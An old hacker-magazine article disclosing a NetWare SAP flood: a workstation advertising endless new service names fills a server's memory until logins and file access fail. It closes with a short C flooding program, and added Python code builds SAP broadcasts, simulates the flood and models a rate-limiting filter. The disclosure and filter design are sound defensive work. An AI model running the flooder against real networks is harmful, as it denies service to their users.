[Chaos CD]
[Datenschleuder] [48]    The SAP Trouble A Message To Novell

 

The SAP Trouble
A Message To Novell

What is Novell's SAP? SAP stands for Service Advertising Protocol. If you have a server program (for example a database like BTRIEVE), you may want clients to find this service on your network automatically. Novell's SAP protocol does exactly that. It works as follows:

Every service on the network broadcasts, once a minute, an IPX packet with a specific IPX socket number. That socket number is 0x0452. Each packet carries up to seven service entries, and every entry provides the following information:

  • node ID (Ethernet address)
  • network number (IPX network)
  • socket on which the service listens
  • network hops
  • name of service (48 characters, unique)
  • type of service (2 bytes, unique; numbers from 0x0 to 0x8000 are owned by Novell, the others are for other companies. You can apply to Novell for a number for your own service at no cost.)

Every NetWare server picks up these broadcasts. The information is written to the bindery and also kept in server memory, because it is routing information and routing lookups must be fast. An entry is deleted after 3 minutes if no fresh broadcast for the same service has arrived in the meantime. If a client wants a service, it sends a request packet to the nearest server, and the server replies with the address under which the service can be reached.
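The exchange described above, as an added example that is not part of the original article: it builds a periodic SAP broadcast (IPX socket 0x0452, up to seven 64-byte service entries), parses it back, and models the server-side SAP table with the 3-minute aging the article describes. The IPX and SAP field layouts are the standard ones; the network and node addresses and the service names are constructed for the example, and simulate_flood() shows how a sender that invents a new name per entry grows the table until the entries age out.

```python
import struct

# IPX header (30 bytes) and one SAP service entry (64 bytes), all big-endian.
IPX_HEADER = struct.Struct(">HHBB4s6sH4s6sH")
SAP_ENTRY = struct.Struct(">H48s4s6sHH")

SAP_SOCKET = 0x0452          # well-known SAP socket, as in the article
IPX_TYPE_SAP = 4             # IPX packet type carried by SAP broadcasts
SAP_OP_PERIODIC = 2          # operation code of the periodic "general response" broadcast
SAP_AGE_SECONDS = 180        # entries not refreshed for 3 minutes are dropped (article)
BROADCAST_NODE = b"\xff" * 6


def build_sap_broadcast(src_net, src_node, services):
    """Build one periodic SAP broadcast sent from src_net/src_node.

    services: list of (service_type, name, socket, hops); a packet holds 1..7 entries.
    """
    if not 1 <= len(services) <= 7:
        raise ValueError("a SAP packet carries between 1 and 7 service entries")
    body = struct.pack(">H", SAP_OP_PERIODIC)
    for svc_type, name, sock, hops in services:
        raw = name.encode("ascii")
        if len(raw) > 47:                      # 48-byte field, NUL-terminated
            raise ValueError("service name longer than 47 characters")
        body += SAP_ENTRY.pack(svc_type, raw.ljust(48, b"\0"), src_net, src_node, sock, hops)
    length = IPX_HEADER.size + len(body)
    header = IPX_HEADER.pack(0xFFFF, length, 0, IPX_TYPE_SAP,
                             src_net, BROADCAST_NODE, SAP_SOCKET,   # destination
                             src_net, src_node, SAP_SOCKET)          # source
    return header + body


def parse_sap(packet):
    """Decode an IPX packet and return its SAP content; reject anything not sent to 0x0452."""
    if len(packet) < IPX_HEADER.size + 2:
        raise ValueError("packet too short for an IPX header plus SAP operation")
    (_cksum, length, _tc, _ptype, _dnet, _dnode, dsock,
     snet, snode, _ssock) = IPX_HEADER.unpack_from(packet, 0)
    if dsock != SAP_SOCKET:
        raise ValueError("destination socket 0x%04x is not SAP" % dsock)
    if length > len(packet):
        raise ValueError("IPX length field exceeds the captured bytes")
    (op,) = struct.unpack_from(">H", packet, IPX_HEADER.size)
    entries = []
    off = IPX_HEADER.size + 2
    while off + SAP_ENTRY.size <= length:          # ignore a trailing partial entry
        svc_type, raw, net, node, sock, hops = SAP_ENTRY.unpack_from(packet, off)
        entries.append({"type": svc_type, "name": raw.split(b"\0", 1)[0].decode("ascii"),
                        "net": net, "node": node, "socket": sock, "hops": hops})
        off += SAP_ENTRY.size
    return {"op": op, "src_net": snet, "src_node": snode, "entries": entries}


class SapTable:
    """Model of the server's SAP table: one record per (type, name), aged after 3 minutes."""

    def __init__(self, age=SAP_AGE_SECONDS):
        self.age = age
        self.records = {}     # (type, name) -> (net, node, socket, hops, last_seen)

    def learn(self, parsed, now):
        for e in parsed["entries"]:
            self.records[(e["type"], e["name"])] = (e["net"], e["node"], e["socket"], e["hops"], now)

    def expire(self, now):
        """Drop records not refreshed within self.age seconds; return how many were dropped."""
        stale = [k for k, v in self.records.items() if now - v[4] >= self.age]
        for k in stale:
            del self.records[k]
        return len(stale)

    def __len__(self):
        return len(self.records)


def simulate_flood(packets, names_per_packet=7):
    """Feed broadcasts that each carry fresh "SLOW<counter>" names into an empty table and
    return (records held while the flood runs, records left once 3 minutes have passed)."""
    net, node = b"\x00\x00\x00\x01", b"\x00\x00\x1b\x2c\x3d\x4e"   # constructed addresses
    table, counter = SapTable(), 0
    for n in range(packets):
        svcs = []
        for _ in range(names_per_packet):
            svcs.append((0x2342, "SLOW%08X" % counter, 0x4000, 1))
            counter += 1
        table.learn(parse_sap(build_sap_broadcast(net, node, svcs)), now=n * 0.001)
    held = len(table)
    table.expire(now=packets * 0.001 + SAP_AGE_SECONDS)
    return held, len(table)
```

A real server also sends its own SAP updates and keeps the bindery copy; the model only tracks the in-memory table, which is the part that grows without bound while the flood runs.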

Now you might say: "What is this guy telling us? We already know this! It is well proven and it runs. There is no disgrace!"

You are not right: there is a disgrace, a big one, and it can bring your server down.

What do you think happens if a program broadcasts its service announcement packet not once a minute, but continuously, as fast as it possibly can? Not much. But what happens if that program produces a new service name or service ID with every packet? The server stores every one of these new services in its bindery. It needs more and more memory to hold them, because this is routing information and routing must be fast. Once the free main memory is gone, the server starts taking memory from the disk cache buffers.

After some time the server has spent ALL of its available memory on SAP information. From this point on you cannot log in, because the login command needs memory and there is none left. You no longer have access to files, because that needs memory too. You cannot look at the packet traffic with MONITOR.NLM, because its window needs memory. You cannot open the router tracking screen (type "TRACK ON") to see what is happening, because there is no memory.

The SAP-broadcast consumes ALL of the server's memory.

Nothing but storing AND FORWARDING of SAP packets happens on the server any more. You can no longer log in or access files!

The server may even crash if NLMs are loaded that need some memory to keep working.

If you stop the broadcasts, the server wipes the SAP entries out after 3 minutes because they are no longer refreshed, and you get your memory back to work as before. On a 3.x server, however, the memory taken from the disk cache is not returned to the cache; it stays as unused server memory, so you have to shut down and reboot unless you accept a slow server. On a 4.x server the memory is returned to the disk cache (the memory management is better there).

You might say that you would never load an NLM that contains a database, or one that does this. But who says that only servers can produce SAP packets?

Any workstation can advertise a service, and the server will store it, because that is its job. Services can reside on workstations too. You can advertise a service and the NetWare server stores it.

So every workstation on the net can produce this SAP overflow. All it takes is a loaded IPX protocol stack (as for playing DOOM over the network) and a small program like the one shown below, and you can cause a lot of trouble for your supervisor. Imagine what happens on large networks in companies or universities!

Every SAP packet that is stored by the server is rebroadcast by that server to all other servers to establish the new service. The whole network is affected.

This would not happen if you had a SAP filter NLM. But Novell only sells this NLM together with its Multi-Protocol Router. As far as I know it works only as a filter towards the WAN side: every SAP packet is still stored on the server as before, it is just not forwarded over the WAN links.

The only chance I see is a universal packet filter, available in source, that sits between the network adapter and the LSL and filters those packets out. You need it in source to build NLMs that meet your specific needs, because you have to write a new one for every form of SAP or RIP abuse.

I have reported this problem to Novell. But they only say: "Well, this might be a problem. The only way is to prevent users from starting a program that produces SAP broadcasts." Well, nice try! But this is not a solution!!! Every user who doesn't like me, or who wants to watch me work, can start such a program and ruin my servers.

THE SOLUTION MUST BE PROVIDED BY NOVELL AND IT MUST COME FAAAAAASSSST!!!!

If you don't believe me, try out the little program printed below. I found a program like the one below on a little BBS where everyone could download it. After I found out what it does I had to publish it. I have chosen this way to publish the problem because I have not received ANY reaction from Novell that REALLY helped me.

If you are a USER, PLEASE tell your SUPERVISOR about this. Tell him that he has to have a filter NLM loaded. Tell him to talk to Novell about getting one. Novell has to upload one in source in this area so that everyone can modify it to meet his needs, for instance filtering so that only 1000 packets per minute are passed to the server, or so that specific workstations that are not secure are filtered out, and so on....
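The filter policy asked for above (a per-workstation packet budget of 1000 per minute, a cap on how many distinct names one node may advertise, and an allow-list of nodes permitted to advertise at all), as an added example that is not code from the article or from Novell: it models the admission decision such a filter NLM would make in front of the server's SAP table. The node names, limits and the sample traffic in demo() are constructed for the example.

```python
from collections import deque

SAP_AGE_SECONDS = 180        # a server forgets an entry after 3 minutes without refresh


class SapFilter:
    """Admission control for SAP advertisements in front of the server's SAP table.

    Policy (constructed for this example, not a Novell product):
      * allowed_nodes: if given, only these source nodes may advertise at all
      * rate_limit:    at most this many SAP packets per source per 60-second window
      * max_names:     at most this many distinct (type, name) pairs per source
    Every arriving packet counts toward the rate window, admitted or not, so a
    flooding node stays throttled for as long as it keeps sending.
    """

    WINDOW = 60.0

    def __init__(self, rate_limit=1000, max_names=64, allowed_nodes=None):
        self.rate_limit = rate_limit
        self.max_names = max_names
        self.allowed_nodes = set(allowed_nodes) if allowed_nodes is not None else None
        self.arrivals = {}   # node -> deque of arrival timestamps inside the window
        self.names = {}      # node -> {(type, name): last_seen}

    def admit(self, src_node, svc_type, name, now):
        """Return (admitted, reason) for one advertisement from src_node at time `now`."""
        if self.allowed_nodes is not None and src_node not in self.allowed_nodes:
            return False, "node not allowed to advertise"
        window = self.arrivals.setdefault(src_node, deque())
        while window and now - window[0] >= self.WINDOW:
            window.popleft()                       # slide the 60-second window
        window.append(now)
        if len(window) > self.rate_limit:
            return False, "rate limit"
        known = self.names.setdefault(src_node, {})
        key = (svc_type, name)
        if key not in known and len(known) >= self.max_names:
            return False, "too many distinct names"
        known[key] = now
        return True, "ok"

    def expire(self, now, age=SAP_AGE_SECONDS):
        """Forget names a node has not refreshed for `age` seconds (same aging as the server)."""
        for known in self.names.values():
            for key in [k for k, seen in known.items() if now - seen >= age]:
                del known[key]


def run_filter(flt, events):
    """Feed (now, src_node, svc_type, name) events through flt; return a count per reason."""
    counts = {}
    for now, node, svc_type, name in events:
        _ok, reason = flt.admit(node, svc_type, name, now)
        counts[reason] = counts.get(reason, 0) + 1
    return counts


def demo():
    """Constructed traffic: an honest file server, a 'SLOW<counter>' flooder, a loud repeater."""
    flt = SapFilter(rate_limit=1000, max_names=64)
    events = []
    # honest server: one broadcast a minute for ten minutes
    events += [(60.0 * m, "fs1", 0x0004, "FS1") for m in range(10)]
    # flooder: 5000 packets within one second, a new service name every time
    events += [(100.0 + n / 5000.0, "ws-bad", 0x2342, "SLOW%08X" % n) for n in range(5000)]
    # repeater: the same name re-sent 2000 times within one second
    events += [(200.0 + n / 2000.0, "ws-loud", 0x2342, "LOUD") for n in range(2000)]
    return run_filter(flt, events)
```

The rate check runs before the name check, so a flooder is first cut off by the name cap (after 64 fresh names) and then, once its packet count passes 1000 in the window, by the rate limit; the honest server that refreshes one name once a minute is never touched.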

If you have the Client SDK, a program that produces this overflow may look like this (the header names were not legible in the scanned original and are given here as assumptions):

#include <stdio.h>
#include <nwcalls.h>      /* NetWare Client SDK header; name assumed, not legible in the scan */
#define NWWIN

main()
{
  char string[20];
  int  i;                /* socket number, filled in by AdvertiseService() */
  long l;

  i = l = 0L;
  do {
    /* a service name nobody has seen before, for every single packet:
       "SLOW" followed by 8 hex digits, 12 characters plus the terminator */
    sprintf(string, "SLOW%08lX", l);
    /* advertise it under service type 0x2342; the server stores each one */
    AdvertiseService(0x2342, string, &i);
    l++;
  } while (42);          /* never stops */
}

Don't blame me for publishing this. Blame Novell for not doing ANYTHING against this.

 
